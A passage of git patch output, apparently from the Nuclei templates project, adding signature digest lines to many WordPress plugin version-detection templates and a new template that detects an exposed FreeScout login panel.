'(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402207a34f6888a9c9d7818f138ff633bce10821cdbd3c6d492935688547e79f2153f02202a03981a9f7b530beaacdc2ab97ef65541f6bb9e524c56724a75ce6d52e49648:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 0da88d5d3f..fff958cf4c 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a004630440220590a5d86fc8af24f788208b63c7088737c0ff09a7589d6f6238a494f20828c6602205c7d90b0d24f8f18da4c29278a27728709be8b5e171af6f28f6d7f4d8583f22c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 2b29428cf1..8747a739bf 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a0048304602210087a3f84e684f9ddb79c028bcb8a5e972a158fa3b8e116fc418a9e7d58a4d465d022100bbc3d87933b4d444bde940b7c0d4503ed9942a41d30a5a3489454723b5c3fc8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 181e619a7c..7cc93f7d54 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100e4e704ce8fe1e6f8d6d1d27d91dbabca386ec94de19a84fec70d94ecbfe1437a022019a4ee4f53ba3f726a259829e28c7c98329c948ec35bf967e6b59b32628d3c9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8164eb4483..b3e1e5221b 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100c979c179353f7d681793cace1d422f163c86a3d1f27252f11711023afa330ef0022100f542f93c8651498a66a073e5bcb1f8ce3231394ef2761ff8cb161d5742f3cebd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 59554defdf..0b4ef1dcbc 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100e47628865d15edc39810907dcc00f07e35c3206c9dd110eb3e212da3ca4dde2e022100a15846875f49436eb32cfed1013b21e4ae78056dd6bac432988fe80104aa49d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 350fd9436b..691a45418c 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a004630440221008d0b6179923d7d3c1d9fcb7de68182edd407f298245ca94b8ea3163ae40d4ad9021f4176a5cc78408250c0d1a26982e444ecc0b2fb00410c98c443fb6e16956fe9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d0dc8d92bb..4950c2445d 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402200b21f26b3d0a95963f394c21472e7aafecad5be0159226909305fbcba6caa06a0220663525bb04ccd5a2a1b29e628f883538de2759a80bc63e45f567e23eb8a6fb44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index c49bbc2b6d..1194d14c8e 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100a64deebfe544d86a2cb793161627891783e0cdc4569a8fadc72b338e6f90486c022100efa8ecea22f23b88b6ee93d9814b1a3e975226f5b818177435fda613b46037fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 27586cbd9d..74be073f54 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100824a66f1e6b3813983925a00276a0ec78d80a3ac412fca9e31ec9b521dcad92202201e3d1cf278320305175113f4edf45f4e109d48e742ace3897675fb2bab56ce4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 946272f0a9..e367140573 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402204a5dbabf1ba87327e144f392a545236d1c6b4c0e8664d0bd417e2d818c5038fd022050199c0b7552176c1cf2771327ba2b7dbc32ec8237403636bb7c4af269c5d3cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index aa29706872..47f931a9da 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450221009f2bfc174eef781f001bb2966c41144d0136ff1c5f72b0d82b0cd7f46269f31702203a10b8b9fc0fd582bb135286a87c4bb5f299134af325463f74680e50a7ffdb19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 290d53ab7e..24ebc94f60 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a004630440220723def0c80447058718fac538e6d3cd351e63b064e69249969ac2868c1d9ebc302204d41bab8bc475baa52b5fd0459717ed0630048337047e5136772105f6fb48e30:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index f7c9ef9b1f..aa6e68d565 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a004630440220639bb465398364c32e7d1f40ff0427ad7975b546f447d83e568d328abcd436d202203b70cc82ae8ebbf72a08cfe6a760952df68e2565b2a8a0ee305e9ab84f0884fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index f1c16275a2..7927be133c 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450220695c74a6542d38b1e29e7dc27245f5e0e79413251390824b34dd086859c408a2022100cd2880d25a9202829b4a9e16a77bef57ca6a0f0e4dcd4ee50053a0f11fab2375:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index fc072e19d8..6e6d0dd888 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450220542394b1f227d51f4937647e743cd2a3683eac7cf03ce51a906e88a140838757022100af2871469abd33b22585c98412273b973c4d2335e7862646cca4e3ce02285197:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index da9df0e8a5..47e9b15f2c 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100d382cef0ad915e62946ae8c26127fee6830d542a4a6ad527a503d1bf04298ef8022043b2399e924d6099bef9f88cbac8d332e977c7312d5ff46190f42f93377bdd54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index f8113d9750..8b5f00ade9 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100b02e9956a21f6c6cc7614f6c86e32fa6ea51c7ca364289a4daa86763b84c7726022077e1a8a0f88b29f34385bdc5f5f28a4541ac52690331f17947743290ce13c351:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 5f80282ab2..019fe5d7f1 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100904b87e9f03e8c638b4f97f84664689b8ed21598e77965754aef38d8c8ec0c750221008418688d838a1dc9615a7e3ba719e04b3e06fb326c8b7ec4d82dd3874385a55a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 5725d5bb3f..a690491dcc 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022063065bca8784cf38c783b7235286da55f1f159956ce48e36395f5b65bb71f3020220347f0f981e22efa907c888829d0e4a359741cd9231c985bbbe7db9dd27a6c0e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index f67a8bc18a..8726cd68d0 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100e7009579ac803485a515bf3179c57d7757a1b2a6d19521a71eba503948f0ca81022100b9ffc802016e38576ad009dc00bd7b3eda9201a453d019388ac4ab146399de77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-crontrol.yaml b/http/technologies/wordpress/plugins/wp-crontrol.yaml index a773829b7d..1a733d2415 100644 --- a/http/technologies/wordpress/plugins/wp-crontrol.yaml +++ b/http/technologies/wordpress/plugins/wp-crontrol.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450220155fa038d7a041696a643c79a305a401a1421495b0875c6afbbcc1b0d9ee781a0221008f21d9b6f3a277583d475c1f93f2364b485af56bc8b3b2b3b5848c0d867c808e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index b9bd4be0a8..906b84bdad 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022053bafcbd13248331a35254774274c0e845f7f7c7329230bc87ce475916a3d5e202204814999c930b85b1c68610861fc77ea8be98286d4cbcb412196218a163f5b09d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index bece4ce486..e878306bf3 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402202ed3908eaba933693118393639146b56f3e1855493eb29f45c47f12b880d178b0220297122159e210528c75e9aa838b1626ea9b8ddd873d1864f731a0f6c28797393:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 138b0aa9a6..a2a5a1618d 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100f1c9aec42c673c730f98da0207969896f1f697ede9408fb014d7e854278b406c022100b23517959d567f52aa6b63c639badea8ab46b40a1fe86c9e0a2ce1984ba61afc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-logging.yaml b/http/technologies/wordpress/plugins/wp-mail-logging.yaml index 01a3669132..7267512449 100644 --- a/http/technologies/wordpress/plugins/wp-mail-logging.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-logging.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022023739bfb52a290fbadb52d5c1ed84054055569fc56381fb33d7c0e8a3fcaa93b022100f90bb091dbb747735428cdeedf41ac7344b663264e74c1903cdf5a14e03195b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 68bf71bc83..dce1b1f9ab 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402206823a69e8ae759316af11f7b7d8f828a95e3b2664cc571c45531e7437e8620940220603ed6a23789957dcf965912d97e87baf63e0b82dea8959ed44e44d00747bac6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index dc18db23b1..aa07968b97 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100c6a46aaca9075965be3b5de5e2d181066d0dbf4fa1824f48d7a093148d3887b7022100fee3f3cc1b29236b28c91b2b66a598660b607e33c1ec6a9738211faf1ee94065:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index c3d10f0135..8ec4f87b57 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502204f920da9e4cb4eacee68afac5e5f97c8f34eb14ed92ded482a14402a50ef9a8f022100b7e50cfe5e6d05d2d89c97641f84e059349d406ebdd168a547e91dd6b2e5bff2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 4a8bc6b75c..e9dd85de73 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022079cb0300a5ffa7a9f4f753ea62aba7f190f58dc58ed35b752bb16bfdbf2aa83202201206901d7f2dbe018ef5ead97f56a5ddc12849487734f6d8f56d0b9b077bdaee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index d2c74355bd..1011748948 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402201be2116f08506039227b5dab3e17e83a00396317d63645446d4bc905c857065802205b0d95a3e6587afef6cee00e3ddb70d7419f1c1d3454ef386e90113c77d07c94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 94b8494b08..56d51079e1 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402206a84f5e66a1af603a3db09bfb528e3cf07711a4d0f4d3783aeb9d733d022a494022008231e9f643353df85a9b7910c0d2fa626ebec7fc9b383db6d246e8f0c8eb2c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 108aba79e9..b993d02a16 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a004830460221009206a7c16e6c086919bc0905401fc80407470ab08c79c02914bad0d6cf6dfc1a022100b1bb3630930cf02a79f7fcb10f6c72119268c78a1869ea9b3cf4a9b732f67e96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index f6f6bf5566..55cdd5aa15 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100ec0fe720acfefd3623d35ac30c5bb40585c43beece2705c2010113f46acfe653022100f73df520b953f4606ccea7402098b5cd1143a04dcdafdcc187d67d53e2177d07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 483cb7cac7..c4cbd9efcc 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502204a8f5ca1fbe964b39b426afb55e3245cc9852f9d0a14b2e4171f471f48f2e87f022100c5fbc25d89c40d691fad970416083074de504d85b83a4b960b77e533ed5f3077:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a132c98df4..de8b4b1f03 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402201035fa34a2174ba57146b1310f9c5f78836feb065deb8911eae4f2a9f47923e102206c0e899fb76c758084b19be984458a256bfd3be88c71a39c3570d6b413f59793:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 135bbee046..e899d300df 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450221009ebc749be4ef2835f6e79af7a6dede008d4e0230b0640773f3b07377e7cb064202207015e1158fa01b50c6a13a08c7b58f694bad03b7c16021d612ab65b7f21d48df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 5b690d96c0..bd231a2ab8 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450220752bdeb9add0ce6095b7ec69ef8c71360470ecbb9993543b0bbc600451e69fed022100e0bda54df1d54d31c57ccf5cb37a0b42d4decec7fd94fa2054d1b169c0c70c18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 16c7d6cff5..8faf6bb2f3 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100924a7e4bf80c9cd12111a61342c06ed2687d8a17e20d3991c92fc5a6f7eb23a7022100b1f8a4904b37603f532dc335695f8774549df9818e3ec9daa3f730bf6ebaef8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index ab099f357e..c9e2e4202f 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100b5afc97ecff89d117a5707bf0318b47ed8e793b8cfab6409128e0f10708dc795022100eac2f97d52808de678b9e01589f31c1e6f00784da6b7a212be127b7062be557a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index ad0b8f8fed..cd096c3b78 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402202bbb310f689618e7c793cb00d8071bdcff1577e0ac9c700b254c0da69e5873fc022058bf9b507454769707b8c6f0a17fe920142d2e66bf73bfe5c1bfc24ff39a6244:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaaf0f9a17..44755aa069 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100c1554a551d5616c12f6afcf2034482ed74abe212be31908a4e2d3e0422402fab02206456c205e101a00c688d5a8adf986779b00c81438008b1ae7cdf1615e02c9ad2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index f943c7afeb..3faa68bd33 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502207187493543aa5bf67960bd1c0053cd2212ea93dfc5b36f1bd36e6c7fe2e147c4022100909fcc8e6ccd59b2a046a242967b99d5823b71d445e55a5e070a737c4cbeb22b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 062e5c85b4..a2e3bb89de 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402202c5bd832930f2b6a99a1ed40dfc04e1db9f29ba191b8dc94a766def2e0b96c1602206eeac465892fdf3e89c287c2331b7718db6eb2c5657a03c294f1dc5da8610ef7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 6dcfdda117..8c658b18b4 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a0048304602210092ebd3518cebbffc7a57b56955e243a51781f6cd6c2915ad1236fe47a2fab391022100f98f86e77ae17053a1a16e17aae06eea1d5c5ac5b246dfd850b00379d072da48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From e9467af733cb55f422caf048b5d5250f3a9be769 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Mon, 14 Oct 2024 15:43:42 +0300 Subject: [PATCH 069/218] add freescout panel --- http/exposed-panels/freescout-panel.yaml | 28 ++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 http/exposed-panels/freescout-panel.yaml diff --git a/http/exposed-panels/freescout-panel.yaml b/http/exposed-panels/freescout-panel.yaml new file mode 100644 index 0000000000..295396cd03 --- /dev/null +++ b/http/exposed-panels/freescout-panel.yaml @@ -0,0 +1,28 @@ +id: freescout-panel + +info: + name: FreeScout Panel - Detect + author: s4e-io + severity: info + description: | + FreeScout panel was discovered. + reference: + - https://github.com/freescout-help-desk/freescout + metadata: + verified: true + max-request: 1 + fofa-query: app="FreeScout" + tags: panel,login,freescout,detect + +http: + - method: GET + path: + - "{{BaseURL}}/login" + + matchers: + - type: dsl + dsl: + - 'contains(body, "FreeScout")' + - 'contains(header, "laravel_session=")' + - 'status_code == 200' + condition: and From f4f19ef49e321ebc74ce472b56d843fbd032e9a2 Mon Sep 17 00:00:00 2001 From: ghost Date: Mon, 14 Oct 2024 14:34:40 +0000 Subject: [PATCH 070/218] 